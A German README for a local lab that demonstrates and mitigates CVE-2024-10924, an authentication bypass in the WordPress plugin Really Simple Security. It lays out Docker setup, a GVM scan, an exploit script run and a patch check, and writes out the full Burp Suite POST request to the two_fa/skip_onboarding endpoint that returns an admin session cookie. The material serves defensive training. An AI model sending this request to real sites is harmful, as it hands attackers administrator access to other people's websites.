
Demonstriert Ausnutzung und Eindämmung von CVE-2024-10924, einer Authentifizierungsumgehung in WordPress Really Simple Security, mit automatisiertem Python-Exploit, manuellen Burp-Suite-Schritten und Patch-Verifizierung.
Dieses Projekt demonstriert die Ausnutzung und Eindämmung von CVE-2024-10924, einer kritischen Authentifizierungsumgehungsschwachstelle im WordPress-Plugin „Really Simple Security“.
Starten Sie die anfällige WordPress-Umgebung: cd wordpress-really-simple-security-authn-bypass-vulnerable-application docker-compose up -d
Überprüfen Sie, ob die Container laufen: docker ps
Zugriff auf WordPress: http://localhost:1337
Erforderliche Werkzeuge:
Führen Sie einen GVM-Scan gegen das Ziel durch:
Methode A - Automatisiertes Python-Exploit: python exploit.py
Methode B - Manuelle Burp Suite:
Fangen Sie den Datenverkehr zu http://localhost:1337 ab
Senden Sie eine POST-Anfrage: POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1 Host: localhost:1337 Content-Type: application/json
{"user_id": 1, "login_nonce": "hack", "redirect_to": "/wp-admin/"}
Beobachten Sie die Antwort mit dem Set-Cookie-Header, der eine Admin-Sitzung enthält
Erwartetes Ergebnis:
Wenden Sie den Patch an, um den anfälligen Endpunkt zu blockieren: .\patch.ps1
Was dies bewirkt:
Führen Sie das Exploit erneut aus (Methode A oder B): python exploit.py
Erwartetes Ergebnis nach Eindämmung:
Zum Stoppen der Umgebung: docker-compose down
Zum Anzeigen der Container-Logs: docker-compose logs -f
Zum legitimen Zugriff auf das WordPress-Admin: http://localhost:1337/wp-admin (Überprüfen Sie die docker-compose.yml auf Anmeldedaten)